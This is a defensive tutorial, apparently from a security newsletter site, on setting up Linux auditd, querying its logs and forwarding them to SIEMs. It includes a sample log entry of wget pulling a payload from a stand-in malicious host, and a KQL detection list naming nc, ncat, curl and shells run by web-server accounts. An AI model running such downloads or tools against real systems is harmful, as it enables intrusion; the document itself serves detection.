rules.d/
Directory where auditd rules are defined: rules in .rules files are loaded at startup; augenrules compiles them into /etc/audit/audit.rules
syscall
Primary audit event source: auditd hooks into specific Linux system calls (execve, open, chmod, setuid, connect) to capture security-relevant operations at the kernel level
ausearch
Command-line tool for querying auditd logs: supports filtering by user, time, event type, and system call; the primary analysis tool for local investigation
aureport
Auditd summary report generator: produces statistics on authentication events, file access, privilege use, and failed system calls for operational visibility

SponsoredRetool

Retool's new app builder is where AI-generated code ships safely

Building apps with AI is easy. Getting them to production safely is another story.

Start building for free today

Linux servers handle the most sensitive workloads in most enterprises: databases, authentication servers, CI/CD infrastructure, cloud instances: yet they receive far less endpoint monitoring attention than Windows machines. Default auditd configurations log only the events the system needs to function, not the events security teams need to detect attacks.

A properly configured auditd deployment captures the Linux equivalent of Sysmon's most valuable events: every process execution with arguments (execve syscall), every modification to sensitive files (/etc/passwd, /etc/sudoers, SSH authorized_keys), every privilege escalation attempt, and every outbound connection from unexpected processes.

Installing and Enabling Auditd

# Install auditd (most Linux distributions)
# RHEL/CentOS/Rocky/AlmaLinux:
yum install audit audit-libs -y
# Ubuntu/Debian:
apt install auditd audispd-plugins -y

# Enable and start the service:
systemctl enable auditd
systemctl start auditd

# Verify status:
auditctl -s
# Output: enabled 1, failure 2, pid 1234, rate_limit 0, backlog_limit 8192...
# enabled 1 = auditd is running
# enabled 2 = immutable mode (rules cannot be changed without reboot)

# Check current rule count:
auditctl -l
# Default: no rules loaded (blank output = nothing being monitored)

Auditd configuration file (/etc/audit/auditd.conf):

# Increase log size and retention for production security monitoring:
log_file = /var/log/audit/audit.log
max_log_file = 100           # MB per log file
max_log_file_action = ROTATE # Rotate when full (not suspend)
num_logs = 20                # Keep 20 rotated files = 2GB total
space_left = 500             # MB remaining before warning
space_left_action = EMAIL    # Alert when running low
admin_space_left = 100       # MB before critical action
admin_space_left_action = SUSPEND  # Stop logging if disk critically full

Deploying a Production Rule Set

The Neo23x0 auditd ruleset (github.com/Neo23x0/auditd) is the most widely used community baseline: maintained by Florian Roth (THOR threat intelligence) and covers MITRE ATT&CK Linux TTPs.

# Download the Neo23x0 ruleset:
wget https://raw.githubusercontent.com/Neo23x0/auditd/master/audit.rules \
  -O /etc/audit/rules.d/audit.rules

# Or clone and install:
git clone https://github.com/Neo23x0/auditd
cp auditd/audit.rules /etc/audit/rules.d/

# Compile rules and reload:
augenrules --load
# augenrules compiles all .rules files in /etc/audit/rules.d/ into audit.rules

# Verify rules loaded:
auditctl -l | head -30
# Should show dozens of rules covering file watches and syscall rules

# Check for any rule failures:
auditctl -l 2>&1 | grep -i error

Key rule categories in the Neo23x0 / production rulesets:

# Category 1: Identity and authentication file monitoring
-w /etc/passwd -p wa -k identity
-w /etc/shadow -p wa -k identity
-w /etc/group -p wa -k identity
-w /etc/gshadow -p wa -k identity
-w /etc/sudoers -p wa -k identity
-w /etc/sudoers.d/ -p wa -k identity
# -w = watch file/directory
# -p wa = watch for write (w) and attribute change (a)
# -k identity = tag events with key "identity" for searching

# Category 2: SSH key modifications (persistence detection)
-w /root/.ssh -p wa -k ssh_keys
-a always,exit -F dir=/home -F filename=authorized_keys -F perm=wa -k ssh_keys
# Alert any time authorized_keys is written: common attacker persistence mechanism

# Category 3: Privilege escalation
-w /bin/su -p x -k privilege_escalation
-w /usr/bin/sudo -p x -k privilege_escalation
-a always,exit -F arch=b64 -S setuid -S setgid -F a0=0 -k setuid

# Category 4: Execution (execve: the most important rule)
-a always,exit -F arch=b64 -S execve -k exec
-a always,exit -F arch=b32 -S execve -k exec
# Captures every process execution with full command arguments
# WARNING: Very high volume on busy systems: tune with exclusions

# Category 5: Scheduled task modification (persistence)
-w /etc/cron.d/ -p wa -k cron
-w /etc/cron.daily/ -p wa -k cron
-w /etc/crontab -p wa -k cron
-w /var/spool/cron/ -p wa -k cron

# Category 6: Module loading (rootkit detection)
-w /sbin/insmod -p x -k modules
-w /sbin/modprobe -p x -k modules
-a always,exit -F arch=b64 -S init_module -S delete_module -k modules
Free daily briefing

Briefings like this, every morning before 9am.

Threat intel, active CVEs, and campaign alerts, distilled for practitioners. 50,000+ subscribers. No noise.

Searching and Analyzing Audit Logs

ausearch: targeted log queries:

# Find all events tagged with the 'identity' key (passwd/shadow modifications):
ausearch -k identity --interpret
# --interpret: converts UIDs to usernames, syscall numbers to names

# Find all execve events from a specific user:
ausearch -k exec -ua www-data --interpret | head -50

# Find events in a specific time window (IR use case):
ausearch -k ssh_keys --start 05/14/2026 03:00:00 --end 05/14/2026 06:00:00

# Find all failed authentication attempts:
ausearch -m USER_AUTH --success no --interpret | tail -50

# Find all privilege escalation events:
ausearch -k privilege_escalation --interpret

aureport: summary statistics:

# Authentication summary (logins, failures):
aureport --auth

# Executable usage summary (most-run commands):
aureport --exe

# Failed events summary:
aureport --failed

# Anomaly summary (unusual UID changes, etc.):
aureport --anomaly

# Summary for a specific time window:
aureport --start 05/14/2026 00:00:00 --end 05/14/2026 23:59:59 --summary

Parse audit log format manually:

# Raw audit log format (each event is a series of TYPE= records):
# type=SYSCALL msg=audit(1747185442.123:4532): arch=c000003e syscall=59
#   success=yes exit=0 a0=55ab1234 a1=55ab5678 a2=55ab9abc a3=7ffe...
#   items=2 ppid=1234 pid=5678 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0
#   egid=0 sgid=0 fsgid=0 tty=pts1 ses=3 comm="wget" exe="/usr/bin/wget"
#   key="exec"
# type=EXECVE msg=audit(1747185442.123:4532): argc=3
#   a0="wget" a1="http://malicious.com/payload" a2="-O" a3="/tmp/update"

# Extract executed commands with arguments:
grep 'key="exec"' /var/log/audit/audit.log | \
  ausearch --raw | aureport --exe --summary | head -20

# Or use Python for structured parsing:
python3 -c "
import subprocess, json
result = subprocess.run(['ausearch', '-k', 'exec', '--raw', '--interpret'],
    capture_output=True, text=True)
for line in result.stdout.split('\n'):
    if 'exe=' in line and 'comm=' in line:
        print(line.strip())
" | head -30

SIEM Integration: Forwarding Audit Logs

Forward to Elastic/OpenSearch with Filebeat:

# /etc/filebeat/filebeat.yml
filebeat.inputs:
- type: log
  enabled: true
  paths:
    - /var/log/audit/audit.log
  tags: ["auditd", "linux"]
  # Use the Filebeat auditd module for structured parsing:

# Or use the dedicated auditd module:
filebeat.modules:
- module: auditd
  log:
    enabled: true
    var.paths: ["/var/log/audit/audit.log*"]

output.elasticsearch:
  hosts: ["https://elasticsearch:9200"]
  index: "auditd-%{+yyyy.MM.dd}"

Forward to Splunk with Universal Forwarder:

# /opt/splunkforwarder/etc/system/local/inputs.conf
[monitor:///var/log/audit/audit.log]
index = linux_audit
sourcetype = linux_audit
disabled = false

# Install the Splunk Add-on for Unix and Linux for proper sourcetype parsing

Forward with audispd (native auditd forwarding plugin):

# Install audisp-remote for forwarding to a central auditd server:
yum install audispd-plugins -y

# Configure /etc/audisp/audisp-remote.conf:
# remote_server = 10.0.0.100  # Central log server
# port = 60
# transport = tcp
# enable_krb5 = yes
# krb5_principal = auditd/server.corp.local

systemctl restart auditd

Sentinel KQL: detect suspicious execve from web server:

// Alert: web server (www-data) executing shells or network tools
Auditd_CL
| where TimeGenerated > ago(24h)
| where key_s == "exec"
| where auid_s != "4294967295"  // Filter unset auid
// Parse exe and comm fields
| extend ExeName = extract(@'exe="([^"]+)"', 1, RawData)
| extend User = extract(@'uid=([^\s]+)', 1, RawData)
| where User in ("33", "www-data", "apache", "nginx")
    and ExeName has_any ("/bin/bash", "/bin/sh", "/usr/bin/python",
        "/usr/bin/nc", "/usr/bin/ncat", "wget", "curl")
| project TimeGenerated, Computer, ExeName, User, RawData
// Web server spawning shell = web shell execution indicator

The bottom line

Deploy the Neo23x0 auditd ruleset (github.com/Neo23x0/auditd) to capture Linux endpoint security events: execve for all process execution, file watches on /etc/passwd, /etc/sudoers, and authorized_keys for persistence detection, setuid/setgid calls for privilege escalation, and cron directory writes for scheduled task persistence. Query with ausearch -k [key] for targeted investigation and aureport for summary statistics. Forward via Filebeat (auditd module) or Splunk Universal Forwarder. Set max_log_file_action = ROTATE and num_logs = 20 in auditd.conf to ensure logs survive across reboots for IR use.

Frequently asked questions

What is auditd and how is it configured for security monitoring?

Auditd is the Linux kernel audit daemon that logs security-relevant system calls and file access events to /var/log/audit/audit.log. Default configuration logs almost nothing useful for security. Deploy the Neo23x0 auditd ruleset (github.com/Neo23x0/auditd) to /etc/audit/rules.d/audit.rules and run augenrules --load to enable comprehensive coverage of process execution (execve), authentication file changes, SSH key modifications, privilege escalation, cron modifications, and kernel module loading.

How do you search auditd logs during incident response?

Use ausearch with rule keys: ausearch -k identity --interpret shows all /etc/passwd and /etc/shadow modifications; ausearch -k exec --interpret shows all process executions; ausearch -k ssh_keys shows authorized_keys changes. Add --start and --end for time-bounded searches during IR. Use aureport --auth for authentication summaries and aureport --exe for execution frequency statistics. Forward logs to SIEM using Filebeat's auditd module for fleet-wide analysis.

What auditd rules detect privilege escalation on Linux?

Key auditd rules for privilege escalation detection: monitor execution of setuid binaries with '-a always,exit -F arch=b64 -S execve -F euid=0 -F uid>=1000 -k priv_esc' (tracks any command that runs as root from a non-root user); monitor changes to sudoers with '-w /etc/sudoers -p wa -k sudoers'; monitor writes to /etc/passwd and /etc/shadow with '-w /etc/passwd -p wa -k identity'; monitor module loading with '-a always,exit -F arch=b64 -S init_module,finit_module -k module_load'; and track capability changes with '-a always,exit -F arch=b64 -S capset -k capability_modification'. These rules are based on CISA's auditd recommendations for Linux hardening.

How do I forward auditd logs to a SIEM in real time?

Two main methods: Filebeat with the auditd module provides the simplest setup on Elastic stack environments — Filebeat reads /var/log/audit/audit.log, parses audit records, and ships to Elasticsearch or Logstash. For Splunk, use the Splunk Universal Forwarder with the Splunk Add-on for Unix and Linux, which includes parsers for audit.log format. For both, configure /etc/audit/auditd.conf to write to a log file (not syslog) and set max_log_file_action to keep_logs to prevent log rotation from dropping events. Alternative: configure audispd plugins (audisp-remote or audisp-syslog) to stream audit events directly to a remote syslog aggregator without intermediate file logging.

What is the Linux auditd audit.rules file and how do I validate my configuration?

Rules in /etc/audit/rules.d/*.rules are loaded at auditd startup and can be viewed with 'auditctl -l'. Validate the loaded ruleset: 'auditctl -l' shows all active rules with their conditions; 'auditctl -s' shows the current auditd status including the number of loaded rules and whether auditd is running in backlog mode (backlog_wait_time > 0 means the system is waiting for audit events to process, indicating potential data loss). A common mistake: rules in /etc/audit/rules.d/ do not take effect until auditd is restarted ('systemctl restart auditd') or rules are loaded manually with 'auditctl -R /etc/audit/rules.d/your-rules.rules'. The STIG for RHEL provides a comprehensive auditd ruleset validated against compliance requirements.

How do you tune auditd execve rules to reduce log volume without losing critical security visibility on busy Linux servers?

The execve syscall rule captures every process execution and generates enormous log volume on busy servers -- thousands of events per minute on an active web server. Tune by adding exclusion rules using '-a never,exit' before the broad execve rule. Exclude kernel threads: '-a never,exit -F arch=b64 -F auid=4294967295 -S execve'. Exclude high-frequency trusted processes: '-a never,exit -F path=/usr/sbin/crond -S execve'. A practical tuning workflow: enable all execve logging for 24-48 hours, then run 'aureport --exe --summary | sort -rn | head -30' to identify the highest-volume executables, then add targeted exclusions for clearly benign processes (monitoring agents, cron executors, sshd). The auditd 'backlog_limit' setting in /etc/audit/auditd.conf controls the kernel audit buffer size: increase from the default 8192 to 32768 on servers with high execve volume to prevent event loss. The Neo23x0 ruleset includes pre-built exclusion templates in the repository that cover common Linux daemons.

Sources & references

  1. Neo23x0: Auditd Best Practice Ruleset
  2. Linux Audit Documentation
  3. IHL: Linux Audit Rules for ATT&CK Coverage

Free resources

25
Free download

Critical CVE Reference Card 2025–2026

25 actively exploited vulnerabilities with CVSS scores, exploit status, and patch availability. Print it, pin it, share it with your SOC team.

No spam. Unsubscribe anytime.

Free download

Ransomware Incident Response Playbook

Step-by-step 24-hour IR checklist covering detection, containment, eradication, and recovery. Built for SOC teams, IR leads, and CISOs.

No spam. Unsubscribe anytime.

Free newsletter

Get threat intel before your inbox does.

50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, daily, no spam.

Unsubscribe anytime. We never sell your data.

Eric Bang
Author

Founder & Cybersecurity Evangelist, Decryption Digest

Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals every morning.

Black Hat Giveaway

Win a $2,495 Black Hat pass.

Full-access to Black Hat USA 2026 in Las Vegas. Subscribe free to enter.

Joins Decryption Digest daily briefing. Unsubscribe anytime.

Giveaway: Black Hat USA 2026 Full-Access Pass ($2,495 value)

Details →
Daily Briefing

Subscribe to enter the giveaway

Every subscriber is automatically entered. You also get daily threat intel every morning: zero-days, ransomware, and nation-state campaigns. Free. No spam.

Already subscribed? You're already entered.

Giveaway

Win a $2,495 Black Hat USA 2026 pass.